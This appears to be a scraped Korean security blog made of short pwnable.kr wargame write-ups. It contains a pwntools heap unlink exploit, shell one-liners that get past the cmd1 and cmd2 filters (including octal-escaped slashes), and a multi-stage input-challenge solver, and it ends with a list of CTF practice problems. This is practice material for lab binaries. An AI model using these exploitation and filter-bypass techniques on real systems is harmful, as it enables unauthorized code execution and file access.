payload

from pwn import *

p = process('/home/unlink/unlink')

p.recvuntil("here is stack address leak:")
stackAddr = int(p.recvline(0), 16)

p.recvuntil("here is heap address leak:")
heapAddr = int(p.recvline(0), 16)

payload = "\xeb\x84\x04\x08"
payload += "A"*12
payload += p32(heapAddr+0xc)
payload += p32(stackAddr+0x10)

p.send(payload)
print p.interactive()


참고

http://www.hackerschool.org/HS_Boards/data/Lib_system/dfb_leon.txt

https://bpsecblog.wordpress.com/2016/10/06/heap_vuln/

http://nroses-taek.tistory.com/160

https://delspon.wordpress.com/2017/07/07/pwnable-kr-unlink/

'Wargame > pwnable.kr' 카테고리의 다른 글

pwnable.kr simple login  (0) 2018.06.27
pwnable.kr fix  (0) 2018.06.23
pwnable.kr cmd2  (0) 2018.06.15
pwnable.kr cmd1  (0) 2018.06.15
pwnable.kr input  (0) 2018.06.14
$ ./cmd2 '$(echo "\057")bin$(echo "\057")cat fla*'

echo로 oct를 표현할 수 있는 방법을 이용해 필터된 slash를 우회했다.


'Wargame > pwnable.kr' 카테고리의 다른 글

pwnable.kr fix  (0) 2018.06.23
pwnable.kr unlink  (1) 2018.06.21
pwnable.kr cmd1  (0) 2018.06.15
pwnable.kr input  (0) 2018.06.14
pwnable.kr coin1  (0) 2018.02.19
$sh  export gogo="flag"
$sh ./cmd1 "/bin/cat \$gogo"


'Wargame > pwnable.kr' 카테고리의 다른 글

pwnable.kr unlink  (1) 2018.06.21
pwnable.kr cmd2  (0) 2018.06.15
pwnable.kr input  (0) 2018.06.14
pwnable.kr coin1  (0) 2018.02.19
[pwnable.kr] shellshock 1p  (0) 2016.08.20

exploit code

# -*- coding: utf-8 -*-
from pwn import *

global port
port = "8080"

def stage1():
	arg = ['/home/input2/input'] 

	for i in range(99):
		arg.append(str(i))	
	arg[65] = "\x00"
	arg[66] = "\x20\x0a\x0d"
	arg[67] = port #stage5
	return arg

def stage2():
	f = open("stderr", "w")
	f.write("\x00\x0a\x02\xff")
	f.close()
	err = open("stderr", "r")
	return err

def stage3():
	env = {'\xde\xad\xbe\xef': '\xca\xfe\xba\xbe'}
	return env

def stage4():
	fp = open("\x0a", "w")
	fp.write("\x00\x00\x00\x00")
	fp.close()
	
def stage5():
	r = remote("localhost", int(port))
	r.sendline("\xde\xad\xbe\xef")
	r.close()

def main():
	p = process(stage1(), env=stage3(), stderr=stage2())
	print p.recv(1024)
	p.sendline("\x00\x0a\x00\xff") # stage2
	print p.recvline('')
	stage4()
	print p.recv(1024)
	stage5()
	p.interactive()
	p.close()

if __name__ == "__main__":
	main()


'Wargame > pwnable.kr' 카테고리의 다른 글

pwnable.kr cmd2  (0) 2018.06.15
pwnable.kr cmd1  (0) 2018.06.15
pwnable.kr coin1  (0) 2018.02.19
[pwnable.kr] shellshock 1p  (0) 2016.08.20
[pwnable.kr] mistake 1p  (0) 2016.08.19

http://khanrc.tistory.com/entry/%ED%95%9C%EA%B8%80-in-the-dictionary-feat-pretty


파싱하다가 딕셔너리에서 한글 인코딩이 막혀서 찾음

'Language > python' 카테고리의 다른 글

[python] 동적 import  (0) 2018.02.11
[python] z3 설치  (0) 2018.02.10
[python] 단순 치환암호 복호화하기  (0) 2017.11.18
[python] try, finally  (0) 2017.11.18
python 코드 잘 짜는 방법  (0) 2017.08.21

pCTF 2013 ropasaurusrex

codegate2013 vuln20

pCTF2013 pork

codegate2014 nuclear

codegate2014 angry_doraemon

exploit-exercises.com fusion level0~4

JFF3 vaja, mipsaurusrex

'HACKING > System hacking' 카테고리의 다른 글

gdb-peda 기능들  (0) 2018.07.08
Shell Escaping tips  (0) 2018.06.23
알아두면 좋은 명령어 모음 (다시 정리하자)  (0) 2018.05.13
libc-database 사용법  (0) 2018.05.13
64bit rop tip  (0) 2018.05.13

+ Recent posts